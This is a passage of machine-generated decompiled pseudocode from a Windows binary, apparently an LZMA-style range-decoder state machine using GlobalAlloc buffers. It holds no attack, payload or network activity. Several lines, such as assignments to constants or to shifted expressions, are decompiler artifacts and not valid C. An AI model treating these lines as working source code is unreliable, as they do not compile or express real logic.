						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
